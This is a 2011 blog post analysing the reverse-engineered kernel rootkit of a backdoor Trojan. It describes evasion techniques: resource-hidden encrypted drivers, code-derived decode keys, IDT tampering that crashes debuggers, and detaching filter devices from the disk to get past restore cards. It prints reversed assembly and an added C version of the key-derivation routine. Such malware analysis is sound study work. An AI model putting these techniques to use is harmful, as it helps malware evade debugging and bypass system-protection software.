Tuesday, October 4, 2011

Rootkit Study, Special 2: Kernel Hooks - Object Hook (1)


Today we begin practical rootkit work. This article covers the object hook.

This article is based on the reversed code of a backdoor Trojan. Some time ago I only posted the application-layer part and not the kernel part, since I did not use it. But for learning purposes the rootkit it uses is a superb example, so I am using it as a first study of rootkits. I hope the code is not used for anything else.

For this rootkit, breaking through the restore card is only one part of its functionality; the remarkable parts lie elsewhere, in how it encrypts and hides information and protects itself against debuggers. After reverse analysis it is clear the author did hard, bitter work; if this code were used in the right direction it would benefit many people......

First information-hiding highlight: the rootkit is hidden as a resource inside the user-mode program.

Second information-hiding highlight: the user-mode program's own code is the input from which the secret key is generated. This effectively prevents the hidden information from being recovered after reverse engineering, because only code that is exactly the original author's code generates the correct key, and only then can the deeply hidden downloader link and code be opened.

Third information-hiding highlight: using a fixed key, an array of 1024 secret-key components is generated; that key array is then applied to the user-mode code to finally produce a 4-byte decode key. With the decode key, the dirty work hidden in its resource is decoded, the driver is loaded into memory, and finally all traces are cleaned up.

Fourth information-hiding highlight: the IDT entry 0Eh (page fault) is modified to point at an invalid address, so that a debugger triggers a BSOD; this is the anti-debugging.

These highlights are only the rootkit's; the user-mode part has many highlights of its own. Since I already posted that code some time ago, everyone can refer to it and find them. OK, joking apart.

Principle of breaking through the restore card: an object hook is used here.

1. The IRP_MJ_CREATE routine obtains the hard disk device object: it calls IoGetDeviceObjectPointer with the device name "\\Device\\Harddisk0\\DR0", then checks whether another device is attached to this device object. If one is, that device is saved and the attachment is removed.

2. In IRP_MJ_CLOSE the attachment to DR0 is restored; this must be done so that it comes and goes without a trace.

OK, let us look at the reversed code:
.model flat, stdcall
option casemap:none

include pcihdd.inc

.data
  aDevicePhysical  db '\Device\PhysicalHardDisk0',0
  aDosdevicesPhys  db '\DosDevices\PhysicalHardDisk0',0
  SourceString db  '\Device\Harddisk0\DR0',0
  g_DeviceObject dd  0
  g_AttachedDevice dd  0
  DecodeKey dd  1024 dup (0)   ; decode secret key array
  DecodeKEY dd  0              ; final 4-byte decode key
  P dd 0
  NumberOfBytes dd 0
  IDTData db 6 dup(0)
  Format db '%08X',0

.code

; Generate the decode secret key array: one entry per byte value (100h entries),
; each computed by 8 rounds of shift-right, xoring in the fixed KEY whenever the
; bit shifted out was 1. Labels (OutLoop, InLoop, ContinueLoop) are restored here
; so the jumps in the listing have their targets.
CreateDecodeKey proc
  jmp  short $+2             ; junk instruction
  mov  ecx, 100h             ; 256 entries
  mov  edx, 0CCECC9B1h       ; fixed KEY
OutLoop:
  lea  eax, [ecx-1]          ; byte value this entry is computed from
  push ecx
  mov  ecx, 8                ; 8 rounds per entry
InLoop:
  shr  eax, 1                ; CF = bit shifted out
  jnb  ContinueLoop          ; CF == 0: no xor this round
  xor  eax, edx
ContinueLoop:
  dec  ecx
  jnz  InLoop
  pop  ecx
  mov  DecodeKey[ecx*4], eax ; save entry of the decode secret key array (index ecx, as in the listing)
  dec  ecx
  jnz  OutLoop
  ret
CreateDecodeKey endp

; Run the whole user-mode code passed in through the IRP against the key array
; generated above, finally producing the decode key. The decode key is then used
; to decode the content of the driver's resource; after decoding, the resource is
; fed back to user mode. (Watch the start.)
; Input: ebx = IRP.AssociatedIrp.SystemBuffer (the user-mode code), ecx = byte count.
; Output: eax = 4-byte decode key.
DecodeInputData proc  near
  jmp  short $+2             ; junk instruction
  mov  eax, 0FFFFFFFFh       ; initial value
  or   ebx, ebx              ; is IRP.AssociatedIrp.SystemBuffer null?
  jz   Quit
@@:
  mov  dl, [ebx]             ; next byte of the user-mode code
  xor  dl, al
  movzx edx, dl              ; table index = (eax xor byte) and 0FFh
  shr  eax, 8
  xor  eax, DecodeKey[edx*4]
  inc  ebx
  dec  ecx
  jnz  @B
  not  eax                   ; final inversion gives the decode key
Quit:                        ; (label position assumed; the listing omits it)
  ret
DecodeInputData endp
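As an added example (not the blog's or the Trojan's own code), the same key derivation in C: a 256-entry table built from the fixed key 0CCECC9B1h, then run over the user-mode code bytes starting from 0FFFFFFFFh with a final NOT, which is how the third highlight turns the user-mode code into the 4-byte decode key. The table is indexed by the byte value each entry was computed from, as the lookup DecodeKey[edx*4] requires; the sample code bytes are constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define FIXED_KEY 0xCCECC9B1u   /* constant loaded into edx in CreateDecodeKey */

static uint32_t decode_table[256];

/* Mirrors CreateDecodeKey: 8 rounds of shift-right per byte value,
   xoring in the fixed key whenever the bit shifted out was 1. */
void create_decode_key(void)
{
    for (unsigned n = 0; n < 256; n++) {
        uint32_t v = n;
        for (int round = 0; round < 8; round++) {
            uint32_t carry = v & 1;   /* the bit shr would move into CF */
            v >>= 1;
            if (carry)                /* jnb skips the xor when CF == 0 */
                v ^= FIXED_KEY;
        }
        decode_table[n] = v;
    }
}

/* Mirrors DecodeInputData: each byte selects a table entry via
   (eax ^ byte) & 0xFF, eax is shifted right 8 and xored with the entry,
   and the result is inverted at the end. A null buffer returns the
   untouched initial value (assumed, as the listing's Quit position is). */
uint32_t decode_input_data(const uint8_t *buf, size_t len)
{
    uint32_t acc = 0xFFFFFFFFu;
    if (buf == NULL)
        return acc;
    for (size_t i = 0; i < len; i++)
        acc = (acc >> 8) ^ decode_table[(acc ^ buf[i]) & 0xFF];
    return ~acc;
}

int main(void)
{
    /* constructed stand-in for the user-mode code bytes in the IRP buffer */
    uint8_t code[] = { 0x7F, 0x00, 0x55, 0x8B, 0xEC };
    create_decode_key();
    printf("decode key:  %08lX\n", (unsigned long)decode_input_data(code, sizeof code));
    code[2] ^= 0x01;   /* a one-bit patch to the user-mode code changes the key */
    printf("patched key: %08lX\n", (unsigned long)decode_input_data(code, sizeof code));
    return 0;
}
```

Because any change to the user-mode code changes the key, a patched or recompiled program can no longer decode the resource, which is the anti-tamper effect the second highlight describes.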
